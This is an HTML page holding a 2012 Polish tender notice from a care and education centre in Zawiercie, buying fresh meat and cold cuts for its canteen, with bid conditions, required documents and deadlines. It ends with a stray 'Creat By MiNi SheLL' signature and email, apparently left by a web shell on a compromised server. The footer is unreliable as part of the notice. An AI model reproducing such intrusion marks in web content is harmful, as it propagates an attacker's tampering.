<ul class="kh_indent_1"><li><p>Przedmiotem zamówienia jest zakup i dostawa mięsa i wędlin na potrzeby stołówki Ośrodka Usług Opiekuńczo - Wychowawczych w Zawierciu.Wspólny słownik Zamówień:  15100000-9 Mięso i wędliny muszą być świeże, nie mrożone,dopuszczone do konsumpcji przez lekarza weterynarii, dostarczone własnym transportem po uprzednim telefonicznym zamówieniu przez upoważnionego pracownika placówki do stołówki Ośrodka.Przy każdej dostawie musi być doręczony dokument stwierdzający pochodzenie towaru  i jego dopuszczenie do obrotu. Ilość potrzebna na każdy dzień umawiana jest ustnie, telefonicznie przez Zamawiającego. Wszystkie produkty powinny być kategorii I i być przydatne do spożycia.Ogólna ilość zamówienia może się zmienić, nie jesteśmy w stanie określić ilości przygotowywanych posiłków w całym okresie trwania umowy.Wszystkie dostarczone artykuły muszą spełniać wymagania HACCP zamawiający nie dopuszcza składania ofert częściowych.TERMIN WYKONANIA ZAMÓWIENIA Zamówienie musi zostać zrealizowane w terminie: do 31.12.2012r WARUNKI UDZIAŁU W POSTĘPOWANIU W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (Dz. U. z 2007 r. nr 223, poz. 1655 z późn. zm.), spełniający warunki i wymagania określone w Specyfikacji Istotnych warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych.
Wykonawcy biorący udział w postępowaniu muszą spełniać następujące warunki:
wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy    z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych.
SPOSÓB POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI:Wyjaśnienia dotyczące Specyfikacji Istotnych Warunków Zamówienia udzielane będą z zachowaniem zasad określonych w ustawie Prawo Zamówień Publicznych (art. 38).
W niniejszym postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie lub faksem. Wybrany sposób przekazywania oświadczeń, wniosków, zawiadomień oraz informacji nie może ograniczać konkurencji; zawsze dopuszczalna jest forma pisemna, z zastrzeżeniem wyjątków przewidzianych w ustawie.
Osoby uprawnione do kontaktów z wykonawcami są:w zakresie proceduralnym osobami upoważnionymi do kontaktu z Wykonawcami są: członek komisji Beata Imiolczyk - referent    tel. 0-32 67-219-32 członek komisji Dorota Mazur - magazynier tel. 0-32 67-219-32
w zakresie merytorycznym osobą upoważnioną do kontaktu  z Wykonawcami jest:
Elżbieta Kołodziej - Dyrektor placówki tel. 0-32 67-219-32
TERMIN ZWIĄZANIA OFERTĄ:
Wykonawca zostaje związany ofertą przez okres 30 dni.
Bieg terminu związania ofertą rozpoczyna się z upływem terminu składania ofert.
OPIS SPOSOBU PRZYGOTOWANIA OFERTY:
Wykonawca może złożyć tylko jedną ofertę, na wybrane zamówienie.
W przypadku unieważnienia postępowania o udzielenie zamówienia z przyczyn leżących po stronie Zamawiającego, Wykonawcom, którzy złożyli oferty,            nie przysługuje roszczenie o zwrot uzasadnionych kosztów uczestnictwa                w postępowaniu.
Oferta wraz ze stanowiącymi jej integralną część załącznikami musi być sporządzona przez Wykonawcę ściśle według postanowień niniejszej Specyfikacji.
Oferta musi być napisana w języku polskim, na komputerze, maszynie do pisania lub ręcznie długopisem bądź niezmywalnym atramentem.
Proponuje się, aby wszystkie zapisane strony oferty wraz z załącznikami były kolejno ponumerowane oraz na każdej stronie podpisane przez osobę (osoby) uprawnione do składania oświadczeń woli w imieniu Wykonawcy, przy czym      co najmniej na pierwszej i ostatniej stronie oferty podpis (podpisy) był opatrzony pieczęcią imienną wykonawcy. Pozostałe strony oferty mogą być parafowane.
Wszelkie poprawki lub zmiany w tekście oferty muszą być parafowane przez osobę (osoby) podpisujące ofertę i opatrzone datami ich dokonania.
Wykonawca nie może powierzyć podwykonawcom zamówienia.
Do ofert należy dołączyć następujące dokumenty i oświadczenia:
Koncesja, zezwolenie lub licencja	Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia     lub licencji na podjecie działalności gospodarczej w zakresie objętym zamówieniem publicznym.
Aktualny odpis z właściwego rejestru	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia               do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie              do udziału w postępowaniu              o udzielenie zamówienia albo składania ofert.
Zaświadczenie, iż przedmiot zamówienia odpowiada normom	Zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającej, że dostarczone produkty odpowiadają określonym normom lub specyfikacjom technicznym
Wskazane dokumenty mogą być doręczone w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę. Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów.
Jeżeli w określonym terminie Wykonawca nie złoży oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub jeżeli złoży dokumenty zawierające błędy, Zamawiający wezwie go do ich uzupełnienia                 w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy będzie podlegać odrzuceniu lub konieczne będzie unieważnienie postępowania. Uzupełniane dokumenty lub oświadczenia powinny spełniać warunki określone w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych (Dz.U. z 2007 r. nr 223,poz. 1655 z późn. zm.). Zamawiający może także w wyznaczonym przez siebie terminie , wezwać do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.
Wykonawca umieszcza ofertę w zamkniętej kopercie oznaczonej nazwą i adresem wykonawcy oraz opisem przedmiotu zamówienia w sposób następujący:
OFERTA NA ZAKUP I DOSTARCZENIE MIESA I WĘDLIN NA POTRZEBY STOŁÓWKI OŚRODKA USŁUG OPIEKUŃCZO - WYCHOWAWCZYCH W ZAWIERCIU
Wykonawca może wprowadzić zmiany lub wycofać złożoną przez siebie ofertę wyłącznie przed terminem składania ofert i pod warunkiem, że przed upływem tego terminu Zamawiający otrzyma pisemne powiadomienie o wprowadzeniu zmian lub wycofaniu oferty. Powiadomienie to musi być opisane i oznaczone słowami ZMIANA lub WYCOFANIE
Zamawiający odrzuci ofertę, jeżeli wystąpią okoliczności wskazane w art. 89      ust. 1 ustawy Prawo Zamówień Publicznych (Dz. U. z 2007 roku Nr 223,           poz. 1655 z późn. zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ouow.zawiercie.powiat.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> OŚRODEK USŁUG OPIEKUŃCZO - WYCHOWAWCZYCH W ZAWIERCIU
UL. DASZYŃSKIEGO 4
42-400 ZAWIERCIE
TEL. 32 67-219-32.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2012 godzina 09:00, miejsce: SEKRETARIAT OŚRODKA USŁUG OPIEKUŃCZO - WYCHOWAWCZYCH W ZAWIERCIU
UL. DASZYŃSKIEGO 4
42-400 ZAWIERCIE.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com